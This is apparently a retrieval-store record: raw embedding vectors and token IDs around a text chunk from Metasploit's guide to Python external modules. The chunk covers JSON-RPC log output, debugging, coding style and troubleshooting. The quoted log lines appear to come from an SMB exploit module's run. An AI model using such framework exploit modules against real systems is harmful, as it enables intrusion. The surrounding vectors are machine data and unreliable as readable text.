-0.23019035160541534, 0.043219488114118576, 0.12298878282308578, 0.4342738687992096, 0.21693189442157745, -0.09740671515464783, -0.6495596170425415, 0.2587243318557739, -0.08901283890008926, 0.704746663570404, -0.24081487953662872, 0.18081875145435333, -0.40440595149993896, 0.5562596321105957, -0.3354143798351288, 0.06873449683189392, -0.16267457604408264, 0.3798580765724182, -0.4500907361507416, -0.747307300567627, -0.3255210816860199, 0.15220333635807037, 0.589788556098938, 0.2220214605331421, 0.21869777143001556, 0.18261362612247467, 1.2375530004501343, 0.8901304006576538, -0.13912220299243927, -0.029441911727190018, 0.32434847950935364, 0.2615211308002472, -0.9307661652565002, 0.14821471273899078, 0.5416414141654968, 0.8718036413192749, 0.026247013360261917, 0.059705816209316254, -0.0804280936717987, -0.2299618124961853, 0.14862121641635895, -0.15949887037277222, -0.27854853868484497, 0.3234257698059082, -0.6165118217468262, 0.27476027607917786, 0.43168559670448303, 0.22999276220798492, -1.0379120111465454, -0.35561293363571167, -0.2454948127269745, -0.6599611043930054, -0.5623877644538879, 0.14977625012397766, -0.1040741354227066, 0.5797737836837769, -0.5555488467216492, 0.09481354802846909, 0.569728434085846, 1.0405198335647583, -0.26392561197280884, 0.6741386651992798, 0.7025560736656189, 0.3810579180717468, -0.7342011332511902, 0.026538031175732613, 0.12918484210968018, -0.17396430671215057, -0.6893207430839539, 0.6676696538925171, 0.3398786187171936, 0.08704636991024017, -0.1175341084599495, 0.7193796038627625, 0.6554269790649414, 0.08561093360185623, 0.198204904794693, -0.43156954646110535, 0.20723098516464233, 0.518039882183075, 0.05135759711265564, -0.13094408810138702, -0.32700100541114807, 0.6903719305992126, 0.3588714301586151, 1.0957305431365967, 0.4351854622364044, -0.5263494253158569, 0.2863636314868927, 0.4816746711730957, 0.31454336643218994, -0.2590375542640686, 0.00447278143838048, 0.6887946128845215, 0.27755045890808105, 0.0266374833881855, 0.7089048027992249, -0.030912959948182106, -0.1078236773610115, -0.052211031317710876, 0.04963922128081322, 0.6424548029899597, 0.2252712994813919, 0.8740508556365967, 0.48313409090042114, 0.32840102910995483, -0.7318328619003296, -0.3173569142818451, 0.8462674021720886, 0.39252379536628723, -0.43772420287132263, -0.36190271377563477, 0.014231749810278416, 0.1784636229276657, -0.5483240485191345, -0.2799404263496399, 0.050537530332803726, 0.08475719392299652, -0.13675758242607117, 0.043285153806209564, -0.47674933075904846, -0.2834726572036743, -0.8001465201377869, -0.5745863318443298, -0.4583054184913635, -0.38927674293518066, -0.6188052296638489, -0.06512350589036942, -0.013711735606193542, -0.18281926214694977, 0.8244232535362244, -0.7362905740737915, -0.2538372874259949, -0.22272615134716034, 0.2291971892118454, 0.4511300325393677, 0.15846066176891327, 0.21382445096969604, -1.3541061878204346, -0.15729112923145294, -0.10138900578022003, 0.5537009239196777, -0.599632978439331, 0.13405586779117584, -0.2935578525066376, -0.45826444029808044, 0.011955427005887032, 0.09179814159870148, 0.5077243447303772, 0.065809465944767, -0.17367303371429443, 0.21911616623401642, -0.03329038247466087, 0.1961459517478943, 0.4612444043159485, 0.07092542946338654, -0.6151725053787231, 0.9864439368247986, -0.08016898483037949, 0.03795813396573067, 0.5372069478034973, 0.7210213541984558, -0.8884060382843018, 0.5587499737739563, 0.1998642385005951, 0.2932530641555786, -0.6600637435913086, 0.5751883387565613, 0.0863935798406601, 0.257995069026947, -0.057760972529649734, 0.015779582783579826, -0.16903185844421387, -0.10172723978757858, -0.039742451161146164, -0.39642956852912903, -0.45445626974105835, -0.08150077611207962, -0.2612285614013672, -0.5184910297393799, 0.37130558490753174, -0.4108131229877472, -0.8201260566711426, -0.23726965487003326, -0.3615413010120392, 0.6753696799278259, -0.09983397275209427, 0.23213687539100647, 0.04999913275241852, -0.06450917571783066, -0.1388198733329773, 0.23075322806835175, 0.354940801858902, -0.27694082260131836, 0.726751983165741, 0.469369500875473, -0.7406230568885803, 0.3247382342815399, -0.05536292865872383, -0.10843772441148758, -0.35251566767692566, 0.25554636120796204, 0.07191697508096695, -0.6276377439498901, 0.2861015796661377, 0.5609623193740845, 0.23094508051872253, 1.0413544178009033, -0.5063888430595398, 0.34923315048217773, 0.4909631311893463, 0.6185405850410461, 0.10850150138139725, -0.10759774595499039, -0.07195984572172165, -0.0019664024002850056, -0.5868498682975769, -0.5807993412017822, -0.1662103831768036, 0.5180041193962097, 0.22514331340789795, 0.1865864098072052, 0.7387492060661316, -0.021840650588274002, -0.32677072286605835, 0.7455353140830994, -0.3297101557254791, -0.42595812678337097, 0.9367689490318298, -0.15034085512161255, 0.3844260275363922, -0.922656238079071, -0.143400639295578, 0.3546240031719208, -0.04934472590684891, 0.663351833820343, 0.0994836613535881, -0.19463180005550385, -0.2743537724018097, -0.23013973236083984, -0.0855591893196106, -0.03388400375843048, 0.4869230389595032, 0.1550806164741516, 0.3810170590877533, -0.2127804160118103, -0.1512005627155304, -0.5896736979484558, 0.47713321447372437, 0.7670242190361023, 0.28563830256462097, 0.39231374859809875, 0.4137398302555084, 0.5632784962654114, -0.23461991548538208, 0.12034645676612854, -0.7285415530204773, 0.46651166677474976, -0.3368701636791229, 0.8065705299377441, -0.06022220104932785, 0.29968056082725525, -0.8521385788917542, -0.19785769283771515, -0.8411049246788025, 0.2202024608850479, -0.0901254266500473, 0.2702302038669586, -0.1927233189344406, 0.023067960515618324, 0.291801393032074, 0.2042178511619568, -0.004464631900191307, -0.5696318745613098, 0.0077607287093997, 0.587214469909668, 0.574273407459259, -0.7471975088119507, 0.3418095111846924, -0.4492737054824829, -0.21127286553382874, 0.02846558205783367, -0.12039021402597427, -0.009882180020213127, -0.5425007939338684, -0.2685467302799225, -0.032379575073719025, 0.2151653915643692, 0.6409916281700134, 0.05741005018353462, 0.30410537123680115, -1.0218029022216797, 0.3342621624469757, 0.49189478158950806, 0.19943739473819733, -1.059008002281189, -0.11310561746358871, 0.22551745176315308, 0.7537297606468201, 0.5561542510986328, -0.2931002676486969, -0.2857676148414612, 0.15590308606624603, -0.8575125336647034, 0.5752015709877014, -0.9725784063339233, 0.6030939221382141, 0.8365660309791565, -0.12778541445732117, -0.18463853001594543, -0.12264983355998993, -0.6628446578979492, -0.20367632806301117, 0.07353471219539642, 0.13414070010185242, -0.3185920715332031, -0.17759287357330322, 0.8074507117271423, -0.3163318634033203, 0.028054239228367805, 0.48908817768096924, 0.14150968194007874, -0.19606651365756989, 0.14052994549274445, -0.4833092987537384, 0.1115400418639183, 0.378396213054657, -0.8864099979400635, 0.6523429155349731, -0.07777959853410721, 0.49492156505584717, 0.034057121723890305, -0.2615661025047302, 0.7656303644180298, -0.08136829733848572, -0.20491062104701996, -0.36642715334892273, -1.0723494291305542, -0.08189700543880463, 0.2019091546535492, -0.03899163380265236, 0.6163132190704346, -0.039860982447862625, -0.2319432646036148, -0.1815183311700821, -0.4617656171321869, -0.9041380286216736, -0.6709312200546265, -0.3150031864643097, -0.43145865201950073, 0.3908382058143616, 0.3860345482826233, 0.4831679165363312, -0.41843917965888977, -0.9812867045402527, 0.671345055103302, -0.48302769660949707, -0.4988211691379547, -0.912837564945221, -0.0808865875005722, -0.5844590663909912, -0.21246010065078735, 0.028520075604319572, 0.6151808500289917, -0.628671407699585, -0.08270315080881119, -0.28811559081077576, 0.3111148178577423, 0.6167179942131042, -0.2885493338108063, -0.9964441061019897, 0.6728054285049438, 0.21603721380233765, -0.4336020052433014, 0.1597665399312973, 0.8513703346252441, -0.5582076907157898, 0.19241753220558167, 0.17365600168704987, -0.43268272280693054, -0.6389175057411194, -0.8059609532356262, 0.21899539232254028, -0.09387244284152985, 0.2635795772075653, -0.724717915058136, -0.721596360206604, -0.4008318781852722, 0.23908652365207672, 0.08623574674129486, -0.7681491374969482, -0.5828891396522522, 0.28030925989151, -0.37687039375305176, -0.04997681453824043, 0.16885368525981903, -0.5936878323554993, -0.5665632486343384, -0.6585732102394104, 0.2807121276855469, -0.21088869869709015, -0.1662837266921997, -0.21100251376628876, -0.145698681473732, -0.24249926209449768, 0.5284788608551025, -0.7684824466705322, -0.7857347726821899, -0.10949298739433289, 0.42180490493774414, -0.8896837830543518, -0.055685680359601974, -0.4181661605834961, 0.6636111736297607, -0.0746203362941742, 0.19127346575260162, -0.4705546796321869, -0.313852995634079, -0.03138245642185211, -0.19100643694400787, 0.8843738436698914, -0.4111597537994385, -0.5093898773193359, -0.1530783772468567, 0.35188645124435425, 0.2363281399011612, -0.3976097106933594, -0.9992205500602722, 0.0612892247736454, -0.26592352986335754, -1.2749121189117432, 0.22369471192359924, 0.25438153743743896, -0.11388895660638809, 0.015132230706512928, 0.16598066687583923, 0.5867646932601929, -0.4533745348453522, 0.34132933616638184, 1.495217204093933, 0.21099510788917542, 0.13567835092544556, -0.4224833846092224, 0.10128243267536163, 0.4089466631412506, -0.36691805720329285, 0.3002610206604004, -0.009182203561067581, 0.32421794533729553, 0.21761423349380493, -0.5355533361434937, 0.07995059341192245, -0.4772815406322479, -0.7345601320266724, 0.9553796648979187, -0.4145861268043518, 0.4130899906158447, -0.12406759709119797, -0.45436155796051025, -0.2733893394470215, 0.19533707201480865, 0.18746961653232574, 0.209807351231575, 0.6779999136924744, 0.7091975808143616, 0.029663722962141037, -0.3135092258453369, 0.2782413363456726, -0.04084256291389465, 0.025477539747953415, 0.8665024638175964, -0.323920875787735, -0.7555040717124939, 0.9996029734611511, 0.8384158611297607, -0.5174558162689209, -0.7422370910644531, -0.5728347897529602, -0.5704307556152344, -0.06576816737651825, 0.001600086921826005, -0.08662717789411545, 0.38053399324417114, -0.21222439408302307, -0.4666454493999481, 0.5349029898643494, 0.2608298659324646, 0.26117652654647827, -0.2213113009929657, 0.6325390934944153, 0.24788537621498108, 0.11100845783948898, 1.1229884624481201, -0.8347044587135315, -0.027428163215517998, -0.9157745838165283, -0.19966334104537964, 0.4866509437561035, -0.274919718503952, 0.8754303455352783, -1.2381911277770996, 0.5968750715255737, -0.2735973000526428, -0.5405881404876709, 0.6939798593521118, -0.47103697061538696, 0.3539929986000061, 0.9870615601539612, -0.32264116406440735, -0.7185919880867004, -0.17713387310504913, -0.20351839065551758, -0.11878617852926254, 0.3440031409263611, -0.01889195293188095, -0.2125929743051529, -0.4897058308124542, -0.017552267760038376, -0.2712172269821167, -0.7852801084518433, -0.9074169993400574, -0.9091042876243591, -0.06530459970235825, -0.15771490335464478, -0.5041565299034119, -0.20360404253005981, -0.08508440852165222, -0.4646645784378052, -0.5777029991149902, -0.2791009545326233, 0.20790401101112366, -0.514076828956604, -0.009713323786854744, -0.6348721385002136, 0.3487313985824585, -0.9043341875076294, -0.32227328419685364, -0.40601328015327454, 0.01900358870625496, -0.5646167993545532, -0.9942662715911865, -0.10157129913568497, -0.12633636593818665, -0.46570831537246704, 0.4101562201976776, -0.272365003824234, -0.34771832823753357, -0.14283686876296997, -0.34194210171699524, -0.027983881533145905, 0.5029596090316772, -0.6443975567817688, -0.08690520375967026, 0.25562506914138794, -0.12103869765996933, 0.4898606240749359, -0.4285256564617157, -0.08090439438819885, -0.19335779547691345, 0.22015130519866943, -0.014288250356912613, 0.07016359269618988, -0.5717776417732239, 0.03629891574382782, 0.17931492626667023, -0.4282008707523346, -0.18844982981681824, -0.2357867807149887, 0.019129173830151558, 0.38476377725601196, -0.6359572410583496, 0.039978064596652985, 0.9562894701957703, 0.2404450625181198, 0.25800541043281555, -0.5451047420501709, 0.8514724373817444, 0.6085706353187561, -0.3353349268436432, 0.11147832870483398, 0.10618732869625092, 0.3389825224876404, -0.12120760232210159, 0.34414762258529663, 0.33645522594451904, -0.6992790102958679, 0.4082721471786499, -0.2858304977416992, -0.34318166971206665, -0.37599068880081177, 0.2735084593296051, 0.1759573221206665, 0.2283480316400528, 0.016145987436175346, -0.4259333610534668, 0.2826789915561676, 0.28859034180641174, -0.3772226572036743, 0.2601504921913147, -0.8486348986625671, -0.24068908393383026, 0.27907076478004456, -0.6390900611877441, -0.06947688013315201, -0.5133942365646362, -0.24143771827220917, -0.3388415575027466, 0.4846975803375244, -0.04242677241563797, 0.7708707451820374, 0.3446604907512665, -0.28777894377708435, 1.1332465410232544, -0.3297855257987976, -0.35633963346481323, -0.49852046370506287, 0.6766138076782227, -0.7681574821472168, -0.8754860162734985, -0.22746048867702484, 1.2584782838821411, 0.2230263203382492, -0.35073575377464294, -0.7220433354377747, 0.20474335551261902, 0.6134606003761292, -0.01878848858177662, -0.5583251714706421, 0.3421662449836731, -0.4631187617778778, 0.3783491551876068, -0.04291949048638344, 0.109290212392807, -0.17386411130428314, 0.5023291707038879, 0.5329287052154541, -0.13508641719818115, -0.28995808959007263, 0.41776272654533386, 0.05425310879945755, 0.10768817365169525, 0.8637989163398743, 0.6234902739524841, 0.4025585949420929, -0.1032482460141182, 0.2680846154689789, -0.023962171748280525, 0.29079923033714294, 0.6271470189094543, 0.26171478629112244, -0.07943599671125412, 0.10724624246358871, 0.5479080080986023, -0.5256484746932983, -0.5667070746421814, 0.7358652949333191, 0.17637144029140472, -0.1806398183107376, 0.8625739812850952, -0.6538770794868469, -0.2994381785392761, -0.16835175454616547, -0.225985586643219, 0.04284951835870743, 0.2645210325717926, -0.2200227826833725, 0.1974969357252121, -0.014087173156440258, 0.34992584586143494, -0.4243309497833252, -0.07852455973625183, 0.2512688934803009, -0.084321029484272, 0.8069096207618713, -0.3693888485431671, -0.5394074320793152, 0.2879137396812439, 0.2951555550098419, 0.5896860957145691, 0.21901428699493408, 0.688349723815918, -0.1700402796268463, 0.03480515256524086, -0.09155454486608505, -0.2283148318529129, -1.1084375381469727, -0.03229169547557831, 0.5139589905738831, -0.5276346206665039, -0.7503018379211426, 0.5910868644714355, 0.8473082184791565, 0.13840143382549286, 0.02092045731842518, 0.06413653492927551, 0.4684746265411377, -0.6018837094306946, 0.6085028052330017, 0.00655497657135129, 0.21023601293563843, 0.6443778276443481, -0.5199182033538818, -0.6914872527122498, 0.9981774091720581, -0.0059188418090343475, 0.755943238735199, -0.0015934980474412441, 1.369715690612793, -0.07505536824464798, 0.6473971605300903, 0.05850077047944069, -0.05031884089112282, -0.0070421756245195866, 0.24060000479221344, -0.4656141400337219, -0.24308152496814728, 0.6492321491241455, -0.24420511722564697, 0.7278624773025513, -0.0906495749950409, -0.04519358649849892, -0.37011170387268066, 0.2024371474981308, -0.42529597878456116, -0.41791313886642456, 0.7202531695365906, 0.30741947889328003, -0.8073953986167908, -0.08314144611358643, 0.46466895937919617, 0.37667056918144226, 0.7697963714599609, 0.05022933706641197, -0.5274117588996887, -0.625674843788147, -0.1830197423696518, -0.10371440649032593, 0.9944406747817993, -0.546291708946228, -0.5024366974830627, -0.1735309660434723, -1.0078085660934448, -0.5931718945503235, 0.5251176357269287, -0.034732263535261154, -0.7555511593818665, 0.1721462458372116, 0.35681694746017456, 1.0272191762924194, -0.0792800784111023, -0.05665599927306175, -0.5887988209724426, 0.07001267373561859, 0.6051508188247681, -0.14536580443382263, 0.97336745262146, 0.3018213212490082, -0.17747415602207184, 0.24149005115032196, -0.2682565152645111, 0.4018135964870453, -0.09507320076227188, 0.7469247579574585, -0.4610437750816345, 0.15401974320411682, -0.6456543803215027, -0.5768888592720032, -0.09390537440776825, 0.08620692044496536, 0.17204125225543976, -0.18262767791748047, -0.7860206961631775, -0.6412678956985474, -0.5134987831115723, 0.03970858082175255, -0.03736184164881706, 0.1305561363697052, -0.24413780868053436, -0.1871289163827896, 0.16116376221179962, -1.3894286155700684, 4.486775875091553, 0.2419692724943161, 0.3321889638900757, 0.02561759389936924, -0.20773719251155853, 0.17154885828495026, 1.446062445640564, -0.6826956868171692, -0.29707691073417664, -0.7266042232513428, -0.10493072122335434, 0.3129624128341675, 0.3586186468601227, 0.2882435917854309, 0.5037333965301514, 0.1393810361623764, -0.3809056580066681, 0.2774348258972168, 0.33737555146217346, -0.5152439475059509, -0.7142250537872314, -0.43883761763572693, -0.47131475806236267, 1.0501619577407837, 0.3193965554237366, 0.1093655452132225, 0.08492939174175262, -0.32229989767074585, 0.4394364655017853, -0.41321903467178345, -0.14889627695083618, -0.45021578669548035, 0.5711745023727417, -0.14694322645664215, -0.6590359210968018, -0.28688374161720276, 0.055268801748752594, -1.2568354606628418, -0.07390006631612778, 0.0487753190100193, 0.5316975712776184, 0.4687592685222626, 0.1491503119468689, -0.3295222818851471, -0.002363163512200117, 0.5224171876907349, -0.45107415318489075, 0.37978699803352356, 0.6852709054946899, -1.0422593355178833, 0.2573859989643097, -0.32841944694519043, 0.14857515692710876, -0.0758667141199112, -0.8974851965904236, 0.6858624815940857, 0.2627502679824829, -0.2422114610671997, -0.0346313901245594, 0.15027715265750885, 0.10753682255744934, -0.30516210198402405, 0.015855371952056885, -0.572496771812439, -0.6376264691352844, 0.280526340007782, -0.12048497796058655, 0.49916526675224304, 0.13761726021766663, 0.5181238651275635, -0.6004337072372437, -0.29524415731430054, -0.6077132821083069, -0.019457636401057243, 0.8161481022834778, 0.04805267974734306, -0.06280673295259476, 0.4024532437324524, 0.5627245306968689, -0.09482863545417786, 0.09239563345909119, -0.18202465772628784, -0.8849287033081055, 0.08284837752580643, 0.7861320972442627, 0.8310940861701965, 0.0768606886267662, -0.5378414988517761, -0.1827400177717209, -0.051866564899683, 0.5111312866210938, 0.05351714789867401, -0.1294075846672058, 0.10158368945121765, 0.05138886347413063 ]
[ 2327, 2504, 18093, 1035, 12359, 3145, 1010, 7528, 2182, 1012, 2917, 2003, 2019, 2742, 1997, 1996, 1006, 2085, 17159, 1007, 5796, 16576, 1035, 5890, 2692, 1035, 10721, 16558, 5657, 1035, 2663, 2620, 1012, 1052, 2100, 11336, 2770, 1024, 1002, 4937, 7047, 1012, 1046, 3385, 1063, 1000, 1046, 3385, 14536, 2278, 1000, 1024, 1000, 1016, 1012, 1014, 1000, 1010, 1000, 8909, 1000, 1024, 1000, 14506, 2581, 1000, 1010, 1000, 4118, 1000, 1024, 1000, 2448, 1000, 1010, 1000, 11498, 5244, 1000, 1024, 1063, 1000, 12034, 9232, 1000, 1024, 2995, 1010, 1000, 1054, 15006, 2102, 1000, 1024, 1000, 17613, 1012, 16923, 1012, 14748, 1012, 14677, 1000, 1010, 1000, 1054, 6442, 1000, 1024, 1000, 4008, 2629, 1000, 1010, 1000, 18087, 8095, 23909, 2015, 1000, 1024, 2410, 1010, 1000, 2832, 18442, 1000, 1024, 1000, 11867, 13669, 2015, 2615, 1012, 4654, 2063, 1000, 1010, 1000, 15488, 8286, 2121, 1000, 1024, 1000, 3231, 1000, 1010, 1000, 15488, 2497, 15194, 1000, 1024, 1000, 13138, 19961, 2575, 1000, 1010, 1000, 18093, 1035, 12359, 1000, 1024, 1000, 1013, 1041, 3593, 2629, 17299, 25036, 11057, 1012, 1012, 1012, 4385, 1012, 1012, 1012, 1027, 1027, 1027, 1000, 1065, 1065, 1002, 4937, 7047, 1012, 1046, 3385, 1064, 18750, 15069, 1027, 1012, 1013, 5622, 2497, 1013, 5796, 2546, 1013, 4563, 1013, 14184, 1013, 6327, 1013, 18750, 1024, 1002, 18750, 15069, 18750, 2509, 14184, 1013, 20397, 1013, 3645, 1013, 15488, 2497, 1013, 5796, 16576, 1035, 5890, 2692, 1035, 10721, 16558, 5657, 1035, 2663, 2620, 1012, 1052, 2100, 1063, 1000, 1046, 3385, 14536, 2278, 1000, 1024, 1000, 1016, 1012, 1014, 1000, 1010, 1000, 4118, 1000, 1024, 1000, 4471, 1000, 1010, 1000, 11498, 5244, 1000, 1024, 1063, 1000, 2504, 1000, 1024, 1000, 18558, 1000, 1010, 1000, 4471, 1000, 1024, 1000, 5806, 16044, 2946, 1024, 13092, 2487, 1000, 1065, 1065, 1063, 1000, 1046, 3385, 14536, 2278, 1000, 1024, 1000, 1016, 1012, 1014, 1000, 1010, 1000, 4118, 1000, 1024, 1000, 4471, 1000, 1010, 1000, 11498, 5244, 1000, 1024, 1063, 1000, 2504, 1000, 1024, 1000, 18558, 1000, 1010, 1000, 4471, 1000, 1024, 1000, 16371, 24798, 9954, 8663, 2078, 1024, 2410, 1000, 1065, 1065, 1063, 1000, 1046, 3385, 14536, 2278, 1000, 1024, 1000, 1016, 1012, 1014, 1000, 1010, 1000, 4118, 1000, 1024, 1000, 4471, 1000, 1010, 1000, 11498, 5244, 1000, 1024, 1063, 1000, 2504, 1000, 1024, 1000, 18558, 1000, 1010, 1000, 4471, 1000, 1024, 1000, 4539, 9808, 1024, 3645, 2184, 4013, 9402, 12740, 1000, 1065, 1065, 1063, 1000, 1046, 3385, 14536, 2278, 1000, 1024, 1000, 1016, 1012, 1014, 1000, 1010, 1000, 4118, 1000, 1024, 1000, 4471, 1000, 1010, 1000, 11498, 5244, 1000, 1024, 1063, 1000, 2504, 1000, 1024, 1000, 18558, 1000, 1010, 1000, 4471, 1000, 1024, 1000, 2288, 2204, 23961, 9099, 3433, 1000, 1065, 1065, 1063, 1000, 1046, 3385, 14536, 2278, 1000, 1024, 1000, 1016, 1012, 1014, 1000, 1010, 1000, 4118, 1000, 1024, 1000, 4471, 1000, 1010, 1000, 11498, 5244, 1000, 1024, 1063, 1000, 2504, 1000, 1024, 1000, 18558, 1000, 1010, 1000, 4471, 1000, 1024, 1000, 2288, 2204, 23961, 9099, 3433, 1000, 1065, 1065, 1063, 1000, 1046, 3385, 14536, 2278, 1000, 1024, 1000, 1016, 1012, 1014, 1000, 1010, 1000, 4118, 1000, 1024, 1000 ]
metasploit
121.txt
5
message ", " params " : { " level " : " info ", " message " : " smb1 session setup allocate nonpaged pool success " } } { " jsonrpc " : " 2. 0 ", " method " : " message ", " params " : { " level " : " info ", " message " : " smb1 session setup allocate nonpaged pool success " } } to add breakpoints to your python code, add the below code snippet. note that the interactive breakpoints will only work when running the external modules as standalone python scripts, and won ’ t work when running from msfconsole : import pdb ; pdb. pry coding with styleall the python code in metasploit aims to be pep 8 compliant. the biggest differences coming from metasploit ’ s ruby style : two lines between functions ( but not class methods ) two lines between different types of code ( like imports and the metadata, see above ) four spaces for indentingsome coding choices to think about when writing your module : prefer " foo { } ". format ('bar') over interpolation with % keep your callback methods short and readable. if it gets cluttered, break out sub - tasks into well - named functionsvariable names should be descriptive, readable, and short ( a guide ) if you really need python3 features in your module, use #! / usr / bin / env python3 for the shebangif you have a lot of legacy code in 2. 7 or need a 2. 7 library, use #! / usr / bin / env python2. 7 ( macos in particular does not ship with a python2 executable by default ) if possible, have your module compatible with both and use #! / usr / bin / env python ( potentially ) common questions why doesn ’ t the module appear when i search for it in msfconsole? the module may have errors and fail to load inside of msfconsole. check the framework log file, ~ /. msf4 / logs / framework. log, for error messages. also, if the module is not marked as executable, then it will not show up when you search for it in msfconsole. why is the output from the python module not showing up in msfconsole? the external modules communicate with framework via json - r
[ 0.028266767039895058, -0.3809918761253357, -0.18410882353782654, 0.2875574827194214, -0.7018448710441589, -0.452085942029953, 0.28264912962913513, 0.09763415157794952, 0.014303063973784447, 1.043816328048706, -0.2354934811592102, -0.08054737746715546, 0.4749561548233032, -0.07494020462036133, -0.004470239859074354, -0.3024483919143677, -0.9254916310310364, -0.398646742105484, -1.0224146842956543, 0.2343435287475586, 0.3041645288467407, -0.17405568063259125, -0.5208443403244019, -0.7582718133926392, -0.6615024209022522, 0.9337930083274841, 0.01900196075439453, -0.016510194167494774, 0.48470577597618103, 0.7528495788574219, -0.2633441090583801, -0.315175861120224, -0.3787297308444977, -0.7786266803741455, 0.08317136019468307, -0.038143329322338104, 0.4101291298866272, -0.6862673163414001, -0.13909408450126648, -0.3977607786655426, 0.6300270557403564, 0.08732423931360245, 0.10369467735290527, -0.5335045456886292, -0.6643922328948975, -0.22293367981910706, 0.3433799743652344, -0.17574582993984222, -0.21830061078071594, -0.5733319520950317, 0.5458675622940063, 0.3995618224143982, 0.08557121455669403, 0.35563555359840393, -0.6248279213905334, 0.04350324720144272, -0.26355111598968506, -0.022568216547369957, -0.41362181305885315, 0.01936003565788269, 0.033890414983034134, 0.556111752986908, 0.01377107109874487, -0.4288256764411926, -0.025341743603348732, 0.724780261516571, 0.30946633219718933, -0.09124833345413208, -0.13973139226436615, -0.18554361164569855, -0.29006633162498474, 0.9159141182899475, -0.20041190087795258, -0.4763050377368927, -0.7655045390129089, 0.1566687524318695, 0.2292119413614273, -0.28799134492874146, 0.11308130621910095, 0.7267978191375732, 0.07286019623279572, 0.5994089841842651, -0.10231152176856995, 0.145756796002388, -0.47180020809173584, -0.42611703276634216, 0.1982349455356598, 0.44055110216140747, 0.005556757561862469, -0.0397956483066082, 0.2926572561264038, 0.30043014883995056, -0.8493640422821045, 0.22993943095207214, 0.3272355794906616, 0.5296850800514221, -0.28648078441619873, 0.0010164477862417698, 0.3055115342140198, -0.11013466119766235, 0.7157570123672485, 1.1400985717773438, -0.02087870053946972, 0.16731572151184082, -0.2682875990867615, 0.34962037205696106, 0.5133249759674072, -0.3597469925880432, 0.006188960280269384, -0.47910064458847046, 0.29663416743278503, 0.21087084710597992, -0.1541784554719925, -1.0218762159347534, -0.051133885979652405, 0.9704907536506653, 0.2513379752635956, -0.5517073273658752, -0.5556734204292297, 0.5900785326957703, -0.29919445514678955, -0.12625551223754883, 0.4379982352256775, -0.3259826898574829, 0.5547371506690979, -0.5704348683357239, 0.6825809478759766, 0.7846208214759827, -0.4417664408683777, 0.002335510915145278, -0.17041602730751038, -0.2235584408044815, 0.054109107702970505, 0.286743700504303, 0.051941826939582825, -0.03473898395895958, 0.02806907333433628, 0.6173180937767029, 0.45996910333633423, -0.5469406843185425, 0.356774240732193, -0.02225850522518158, 0.24509695172309875, 1.0628081560134888, 0.3843006491661072, -0.4293838143348694, -0.24581530690193176, -0.10935759544372559, -0.8197481036186218, -0.20192283391952515, -0.35523080825805664, -0.08016190677881241, 0.4694038927555084, -0.7174537777900696, -0.442928284406662, 0.21036863327026367, -0.24789373576641083, 0.3838190734386444, -0.16123661398887634, -0.006319151259958744, -0.4706812798976898, 0.8311377763748169, 0.21065203845500946, 0.6437903046607971, -0.4690380096435547, 0.40390536189079285, -0.8356006145477295, -0.7658820748329163, -0.06502580642700195, 0.1119886040687561, 0.3245126008987427, 0.3488723039627075, 0.43283283710479736, 0.18787463009357452, 1.2004168033599854, 0.782842755317688, -0.20933975279331207, -0.05372626334428787, 0.05282193049788475, 0.3322141170501709, -0.4874131679534912, 0.34967243671417236, 0.338263601064682, 0.554161012172699, 0.34511247277259827, 0.1395578682422638, 0.14719383418560028, -0.44534292817115784, -0.23056846857070923, 0.13775767385959625, 0.12692855298519135, 0.6763095855712891, -0.49771538376808167, 0.4379773437976837, 0.3562583923339844, 0.22944994270801544, -0.8598645925521851, 0.05215834826231003, -0.23798848688602448, -1.0560928583145142, -0.4620920419692993, 0.2668176293373108, 0.3465995490550995, 0.48823049664497375, -0.2625746726989746, -0.46304577589035034, 0.7329258322715759, 0.700616717338562, -0.28938037157058716, 0.5024430155754089, 0.835188090801239, -0.4517178237438202, -0.9495353102684021, 0.23260758817195892, -0.30227649211883545, -0.2558259069919586, -0.4425358474254608, 0.27317091822624207, -0.06192932650446892, 0.6139582991600037, 0.28059786558151245, 0.5599312782287598, 0.3143676519393921, 0.15300682187080383, -0.1749657243490219, -0.689834475517273, -0.23751269280910492, 0.3338635265827179, -0.32810381054878235, 0.09986144304275513, -0.15836697816848755, 0.3762299418449402, 0.5161551237106323, 0.8119431138038635, 0.5349762439727783, -0.23374415934085846, 0.11268902570009232, 0.7658907771110535, 0.22526580095291138, -0.0484197773039341, 0.3167504370212555, 0.7063141465187073, 0.2681567072868347, 0.01844204030930996, 0.2600632309913635, 0.3469802439212799, -0.5278502106666565, -0.33437687158584595, 0.2559053599834442, 0.7814818024635315, -0.49726182222366333, 1.115167498588562, 0.3428250849246979, 0.09047666937112808, -0.9464148283004761, -0.45193254947662354, 0.8501524925231934, 0.7715851664543152, -1.0754508972167969, -0.522155225276947, 0.19486479461193085, 0.6318891048431396, -0.36409178376197815, -0.15094423294067383, 0.18822717666625977, 0.5652356147766113, -0.3342348635196686, 0.00847885012626648, -0.12802809476852417, -0.8463236093521118, -0.5482189059257507, -0.12007609754800797, -0.7736009955406189, -0.6783015727996826, -0.6057669520378113, -0.03488761559128761, 0.582741916179657, -0.18835917115211487, 0.6411322951316833, -0.42134445905685425, -0.5778809785842896, -0.022585099563002586, 0.11025814712047577, 0.3215915262699127, -0.008259710855782032, 0.1404421031475067, -0.7706400752067566, -0.13416694104671478, -0.22941814363002777, 1.4216609001159668, -0.38247254490852356, -0.5535591244697571, 0.06801607459783554, -0.014161096885800362, 0.22374826669692993, 0.09897617250680923, 0.8810412287712097, 0.259886234998703, -0.16803589463233948, -0.19879019260406494, 0.08103237301111221, -0.2976095378398895, 0.3594791293144226, 0.08140800893306732, -0.4913669228553772, 0.9011774659156799, 0.0761142298579216, -0.1648392379283905, 0.8114210963249207, 0.7106210589408875, -0.6478303670883179, -0.07488289475440979, -0.06550917774438858, 0.12323413044214249, -0.7596038579940796, 0.7543556690216064, 0.16829848289489746, 0.41894999146461487, 0.1833573579788208, -0.4560178816318512, 0.35568422079086304, 0.45152485370635986, -0.10031053423881531, 0.22120316326618195, -0.5989619493484497, 0.4350786507129669, 0.08631084859371185, -0.7942568063735962, 0.7478251457214355, -0.8592344522476196, 0.14424513280391693, -0.18992166221141815, 0.12897425889968872, 0.9844181537628174, 0.2680729925632477, 0.00800912082195282, -0.340660035610199, -0.05784217268228531, 0.12806251645088196, 0.5077543258666992, 0.669988751411438, -0.4785985052585602, 0.5653560161590576, 0.004477136768400669, -0.19093115627765656, 0.6606611013412476, -0.010276480577886105, -0.4903676509857178, -0.12777632474899292, 0.3245622217655182, -0.644944965839386, 0.046450238674879074, 0.44577470421791077, 0.40242743492126465, -0.01760794036090374, 0.777874231338501, -0.6873167157173157, -0.551225483417511, 